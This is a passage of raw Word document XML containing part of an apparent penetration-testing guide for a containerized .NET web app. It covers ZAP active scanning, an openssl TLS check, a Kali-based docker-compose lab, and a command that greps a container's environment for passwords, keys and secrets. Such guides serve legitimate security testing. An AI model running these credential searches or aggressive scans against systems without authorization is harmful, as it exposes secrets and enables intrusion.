          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Run Active Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">: Right-click your target in the "Sites" tree and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Attack &gt; Active Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. ZAP will aggressively fuzz all parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221AD217">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Reviewing SSL/TLS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA834F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Since the app runs inside a container, certificate handling can be messy. Test for weak TLS configurations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Check HTTPS Ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: .NET containers often map ports differently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C6E6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Standard user: HTTP 8080, HTTPS 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187527D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Root user: HTTP 80, HTTPS 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61860738">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Command to check TLS (using openssl)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCFDE4F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A907D46">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Test for weak ciphers or protocol versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7422DAF1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>openssl s_client -connect localhost:7001 -tls1_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78363AB2">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3: Configuration &amp; Artifact Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376B546">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Look at how the container is built. These are often easy wins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C152CF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>1. Check for Hardcoded Secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>The Docker build process is viewable. Check if the developer accidentally left credentials in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A3D0C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB4B5E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Inside the running container, check environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B214E9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>env | grep -i "pass\|key\|secret\|connection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D913DF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Look for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: ASPNETCORE_ENVIRONMENT=Production combined with DB_CONNECTION=Server=db;User=sa;Password=Admin123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC3B10">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>2. Privilege Escalation (Inside Container)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Check if the app is running as "root". If it is, any bug (like a file upload) gives an attacker full control of the container immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D2A19D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EE4D7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Inside the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE0005">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8399A7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># If it returns 'root', that is a security finding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA93B4">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Setting Up a Safe Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F139C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If you want to test these techniques without breaking a production app, you can build an isolated lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09427BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A standard setup includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569758DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Your .NET Web App running in Docker Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738958A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Kali Linux container (with pre-installed tools like Nmap, ZAP, Metasploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CD89A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: An isolated Docker bridge network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0826A031">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A basic docker-compose.yml structure for testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC2715">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D41BB5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4837C8BE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D00A2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  net-app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE1800">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    build: .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB86F9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5E988">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "8080:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CCF8A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59629F66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">      - pentest-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3789E3B9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF1F79D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B51FD8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: kalilinux/kali-rolling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F938B30">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    command: tail -f /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FBBF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA61DF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">      - pentest-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB986E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Optional: Map VNC port for GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177F133">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D29B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "5900:5900"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E61271">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E6565">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64C6B5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  pentest-network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127E0A0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">    driver: bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E12FEB">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Recommended Toolset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F82364">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: docker ps, docker inspect, nmap (from inside container)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48725EB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Container Escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
